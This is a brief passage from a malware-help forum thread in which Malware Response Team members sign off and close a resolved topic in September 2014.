  • Malware Response Team

Posted 12 September 2014 - 10:41 AM

You're welcome.
Take care.

#13 aharonov

  • Malware Response Team

Posted 12 September 2014 - 10:42 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.



